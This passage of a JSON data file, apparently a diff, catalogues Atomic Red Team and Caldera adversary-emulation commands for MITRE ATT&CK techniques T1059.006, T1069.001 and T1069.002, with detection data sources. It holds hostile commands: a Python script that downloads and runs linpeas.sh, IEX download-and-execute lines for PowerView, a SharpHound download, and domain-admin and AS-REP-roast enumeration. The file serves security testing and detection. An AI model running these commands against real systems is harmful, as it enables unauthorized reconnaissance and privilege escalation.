"6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8", + "description": "Create Python file (.py) that downloads and executes shell script via executor arguments", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "python_script_name": { + "description": "Python script name", + "type": "Path", + "default": "T1059.006.py" + }, + "script_url": { + "description": "Shell script public URL", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + 
"payload_file_name": { + "description": "Shell script file name downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Payload or script interpreter / executor", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests \n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "name": "sh", + "cleanup_command": "rm #{python_script_name} #{payload_file_name} \n" + } + }, + { + "name": "Execute Python via Python executables (Linux)", + "auto_generated_guid": "0b44d79b-570a-4b27-a31f-3bf2156e5eaa", + "description": "Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally 
using the supplied executor and arguments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "python_script_name": { + "description": "Name of Python script name", + "type": "Path", + "default": "T1059.006.py" + }, + "script_url": { + "description": "URL hosting external malicious payload", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + "payload_file_name": { + "description": "Shell script file name downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Payload or script interpreter / executor", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + }, + "python_binary_name": { + "description": "Name of Python file to be compiled", + "type": "Path", + "default": "T1059.006.pyc" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests \n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> 
#{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "name": "sh", + "cleanup_command": "rm #{python_binary_name} #{python_script_name} #{payload_file_name}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": 
"user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1069.001", + "command_list": [ + "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. 
skipping...\"; fi;\ncat /etc/group\n", + "net localgroup\nnet localgroup \"Administrators\"\n", + "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"$env:UserDnsDomain\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"$env:TEMP\\SharpHound.exe\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "New-Item -Path \"$env:TEMP\\SharpHound\\\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"$env:TEMP\\SharpHound\\\"\n", + "wmic.exe group get name\n", + "Get-WMIObject Win32_Group\n", + "gpresult /R\n", + "groups" + ], + "commands": [ + { + "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. 
skipping...\"; fi;\ncat /etc/group\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "net localgroup\nnet localgroup \"Administrators\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"$env:UserDnsDomain\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"$env:TEMP\\SharpHound.exe\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "New-Item -Path \"$env:TEMP\\SharpHound\\\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"$env:TEMP\\SharpHound\\\"\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "wmic.exe group get name\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + "command": "Get-WMIObject Win32_Group\n", + "source": "atomics/T1069.001/T1069.001.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Local Groups" + }, + { + 
"command": "gpresult /R\n", + "source": "data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml", + "name": "Summary of permission and security groups" + }, + { + "command": "groups", + "source": "data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml", + "name": "Summary of permission and security groups" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1069.001", + "display_name": "Permission Groups Discovery: Local Groups", + "atomic_tests": [ + { + "name": "Permission Groups Discovery (Local)", + "auto_generated_guid": "952931a4-af0b-4335-bbbe-73c8c5b327ae", + "description": "Permission Groups Discovery\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", + "name": "sh" + } + }, + { + "name": "Basic Permission Groups Discovery Windows (Local)", + "auto_generated_guid": "1f454dd6-e134-44df-bebb-67de70fb6cd8", + "description": "Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. 
Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net localgroup\nnet localgroup \"Administrators\"\n", + "name": "command_prompt" + } + }, + { + "name": "Permission Groups Discovery PowerShell (Local)", + "auto_generated_guid": "a580462d-2c19-4bc7-8b9a-57a41b7d3ba4", + "description": "Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-localgroup\nGet-LocalGroupMember -Name \"Administrators\"\n", + "name": "powershell" + } + }, + { + "name": "SharpHound3 - LocalAdmin", + "auto_generated_guid": "e03ada14-0980-4107-aff1-7783b2b59bb1", + "description": "This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "FQDN of the targeted domain", + "type": "string", + "default": "$env:UserDnsDomain" + }, + "sharphound_path": { + "description": "SharpHound Windows executable", + "type": "path", + "default": "$env:TEMP\\SharpHound.exe" + }, + "output_path": { + "description": "Output for SharpHound", + "type": "path", + "default": "$env:TEMP\\SharpHound\\" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "SharpHound binary must exist on disk and at specified location (#{sharphound_path}).\nAnd the computer must be domain joined (implicit authentication).\n", + "prereq_command": "if (Test-Path \"#{sharphound_path}\") { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true\" -OutFile \"#{sharphound_path}\"\n" + } + ], + 
"executor": { + "name": "powershell", + "elevation_required": false, + "command": "New-Item -Path \"#{output_path}\" -ItemType Directory > $null\n& \"#{sharphound_path}\" -d \"#{domain}\" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory \"#{output_path}\"\n", + "cleanup_command": "Remove-Item -Recurse #{output_path} -ErrorAction Ignore\n" + } + }, + { + "name": "Wmic Group Discovery", + "auto_generated_guid": "7413be50-be8e-430f-ad4d-07bf197884b2", + "description": "Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe group get name\n", + "name": "powershell" + } + }, + { + "name": "WMIObject Group Discovery", + "auto_generated_guid": "69119e58-96db-4110-ad27-954e48f3bb13", + "description": "Utilizing PowerShell cmdlet - get-wmiobject, to enumerate local groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-WMIObject Win32_Group\n", + "name": "powershell" + } + } + ] + }, + { + "id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2", + "name": "Permission Groups Discovery", + "description": "Summary of permission and security groups", + "tactic": "discovery", + "technique": { + "attack_id": "T1069.001", + "name": "Permission Groups Discovery: Local Groups" + }, + "platforms": { + "windows": { + "psh": { + "command": "gpresult /R\n" + } + }, + "darwin": { + "sh": { + "command": "groups" + } + }, + "linux": { + "sh": { + "command": "groups" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1069.002", + "command_list": [ + "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "get-ADPrincipalGroupMembership administrator | select name\n", + "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose\"\n", + "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=group)\n", + "Get-AdGroup -Filter *\n", + 
"([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n", + "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn}\n" + ], + "commands": [ + { + "command": "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "get-ADPrincipalGroupMembership administrator | select name\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test 
- Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose\"\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=group)\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Get-AdGroup -Filter *\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + 
"command": "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember \"Domain Admins\"\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose\n", + "source": "atomics/T1069.002/T1069.002.yaml", + "name": "Atomic Red Team Test - Permission Groups Discovery: Domain Groups" + }, + { + "command": "Import-Module .\\powerview.ps1;\n$backup = \"#{backup.admin.ability}\";\n$userName = \"#{domain.user.name}\";\n$userPassword = \"#{domain.user.password}\";\n$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force;\n$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword);\nGet-NetLocalGroupMember -ComputerName #{remote.host.fqdn} -Credential $credObject\n", + "source": "data/abilities/discovery/2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml", + "name": "Use PowerView to query the Active Directory server to determine remote admins" + }, + { + "command": "Import-Module .\\powerview.ps1;\nGet-NetLocalGroupMember -ComputerName 
#{remote.host.fqdn}\n", + "source": "data/abilities/discovery/6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml", + "name": "Use PowerView to query the Active Directory server to determine remote admins" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1069.002", + "display_name": "Permission Groups Discovery: Domain Groups", + "atomic_tests": [ + { + "name": "Basic Permission Groups Discovery Windows (Domain)", + "auto_generated_guid": "dd66d77d-8998-48c0-8024-df263dc2ce5d", + "description": "Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net localgroup\nnet group /domain\nnet group \"domain admins\" /domain\nnet group \"enterprise admins\" /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Permission Groups Discovery PowerShell (Domain)", + "auto_generated_guid": "6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7", + "description": "Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain\ninformation will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user": { + "description": "User to identify what groups a user is a member of", + "type": "String", + "default": "administrator" + } + }, + "executor": { + "command": "get-ADPrincipalGroupMembership #{user} | select name\n", + "name": "powershell" + } + }, + { + "name": "Elevated group enumeration using net group (Domain)", + "auto_generated_guid": "0afb5163-8181-432e-9405-4322710c0c37", + "description": "Runs \"net group\" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This\ntest will display some errors if run on a computer not connected to a domain. 
Upon execution, domain information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net group /domai \"Domain Admins\"\nnet groups \"Account Operators\" /doma\nnet groups \"Exchange Organization Management\" /doma\nnet group \"BUILTIN\\Backup Operators\" /doma\n", + "name": "command_prompt" + } + }, + { + "name": "Find machines where user has local admin access (PowerView)", + "auto_generated_guid": "a2d71eee-a353-4232-9f86-54f4288dd8c1", + "description": "Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Find local admins on all machines in domain (PowerView)", + "auto_generated_guid": "a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd", + "description": "Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Find Local Admins via Group Policy (PowerView)", + "auto_generated_guid": "64fdb43b-5259-467a-b000-1b02c00e510a", + "description": "takes a computer and determines who has admin rights over it through GPO enumeration. 
Upon execution, information about the machine will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "hostname of the computer to analyze", + "type": "Path", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose\"\n", + "name": "powershell" + } + }, + { + "name": "Enumerate Users Not Requiring Pre Auth (ASRepRoast)", + "auto_generated_guid": "870ba71e-6858-4f6d-895c-bb6237f6121b", + "description": "When successful, accounts that do not require kerberos pre-auth will be returned\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined.\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually.\n" + }, + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n" + } + }, + { + "name": "Adfind - Query Active Directory Groups", + "auto_generated_guid": "48ddc687-82af-40b7-8472-ff1e742e8274", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. 
